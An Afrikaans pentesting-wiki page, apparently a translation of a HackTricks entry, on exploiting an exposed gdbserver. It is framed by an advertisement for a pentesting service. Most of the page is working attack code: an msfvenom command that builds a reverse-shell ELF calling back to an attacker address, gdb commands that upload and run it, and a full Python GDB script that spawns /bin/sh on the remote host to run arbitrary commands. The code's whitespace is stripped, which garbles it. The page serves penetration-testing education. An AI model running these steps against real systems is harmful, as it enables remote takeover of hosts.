Kry 'n hacker se perspektief op jou webtoepassings, netwerk, en wolk
Vind en rapporteer kritieke, exploiteerbare kwesbaarhede met werklike besigheidsimpak. Gebruik ons 20+ pasgemaakte gereedskap om die aanvaloppervlak te karteer, vind sekuriteitskwessies wat jou toelaat om bevoegdhede te verhoog, en gebruik geoutomatiseerde eksploit om noodsaaklike bewyse te versamel, wat jou harde werk in oortuigende verslae omskep.
gdbserver is 'n hulpmiddel wat die afstandsdebugin van programme moontlik maak. Dit loop saam met die program wat gedebugeer moet word op dieselfde stelsel, bekend as die "teiken." Hierdie opstelling laat die GNU Debugger toe om van 'n ander masjien, die "gasheer," te verbind, waar die bronskode en 'n binêre kopie van die gedebugeerde program gestoor word. Die verbinding tussen gdbserver en die debugger kan oor TCP of 'n seriële lyn gemaak word, wat veelsydige debugin-opstellings moontlik maak.
Jy kan 'n gdbserver laat luister op enige poort en op die oomblik nmap is nie in staat om die diens te herken nie.
Exploitatie
Laai op en Voer uit
Jy kan maklik 'n elf backdoor met msfvenom skep, dit op laai en uitvoer:
# Trick shared by @B1n4rySh4d0wmsfvenom-plinux/x64/shell_reverse_tcpLHOST=10.10.10.10LPORT=4444PrependFork=true-felf-obinary.elfchmod+xbinary.elfgdbbinary.elf# Set remote debuger targettargetextended-remote10.10.10.11:1337# Upload elf fileremoteputbinary.elfbinary.elf# Set remote executable filesetremoteexec-file/home/user/binary.elf# Execute reverse shell executablerun# You should get your reverse-shell
# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.targetextended-remote192.168.1.4:2345# Load our custom gdb command `rcmd`.source./remote-cmd.py# Change to a trusty binary and run it to load itsetremoteexec-file/bin/bashr# Run until a point where libc has been loaded on the remote process, e.g. start of main().tbmainr# Run the remote command, e.g. `ls`.rcmdls
Eerstens skep plaaslik hierdie skrip:
remote-cmd.py
#!/usr/bin/env python3import gdbimport reimport tracebackimport uuidclassRemoteCmd(gdb.Command):def__init__(self):self.addresses ={}self.tmp_file =f'/tmp/{uuid.uuid4().hex}'gdb.write(f"Using tmp output file: {self.tmp_file}.\n")gdb.execute("set detach-on-fork off")gdb.execute("set follow-fork-mode parent")gdb.execute("set max-value-size unlimited")gdb.execute("set pagination off")gdb.execute("set print elements 0")gdb.execute("set print repeats 0")super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)defpreload(self):for symbol in ["close","execl","fork","free","lseek","malloc","open","read",]:self.load(symbol)defload(self,symbol):if symbol notin self.addresses:address_string = gdb.execute(f"info address {symbol}", to_string=True)match = re.match(f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE)if match andlen(match.groups())>0:self.addresses[symbol]= match.groups()[0]else:raiseRuntimeError(f'Could not retrieve address for symbol "{symbol}".')return self.addresses[symbol]defoutput(self):# From `fcntl-linux.h`O_RDONLY =0gdb.execute(f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})')# From `stdio.h`SEEK_SET =0SEEK_END =2gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')ifint(gdb.convenience_variable("len"))<=0:gdb.write("No output was captured.")returngdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')gdb.execute('printf "%s\\n", (char*) $mem')gdb.execute(f'call (int){self.load("close")}($fd)')gdb.execute(f'call (int){self.load("free")}($mem)')definvoke(self,arg,from_tty):try:self.preload()is_auto_solib_add = gdb.parameter("auto-solib-add")gdb.execute("set auto-solib-add off")parent_inferior = gdb.selected_inferior()gdb.execute(f'set $child_pid = (int){self.load("fork")}()')child_pid = gdb.convenience_variable("child_pid")child_inferior =list(filter(lambdax: x.pid == child_pid, gdb.inferiors()))[0]gdb.execute(f"inferior {child_inferior.num}")try:gdb.execute(f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)')except gdb.error as e:if ("The program being debugged exited while in a function called from GDB"instr(e)):passelse:raise efinally:gdb.execute(f"inferior {parent_inferior.num}")gdb.execute(f"remove-inferiors {child_inferior.num}")self.output()exceptExceptionas e:gdb.write("".join(traceback.TracebackException.from_exception(e).format()))raise efinally:gdb.execute(f'set auto-solib-add {"on"if is_auto_solib_add else"off"}')RemoteCmd()
Kry 'n hacker se perspektief op jou webtoepassings, netwerk en wolk
Vind en rapporteer kritieke, exploiteerbare kwesbaarhede met werklike besigheidsimpak. Gebruik ons 20+ pasgemaakte gereedskap om die aanvaloppervlak te karteer, vind sekuriteitskwessies wat jou toelaat om bevoegdhede te verhoog, en gebruik geoutomatiseerde eksploit om noodsaaklike bewyse te versamel, wat jou harde werk in oortuigende verslae omskakel.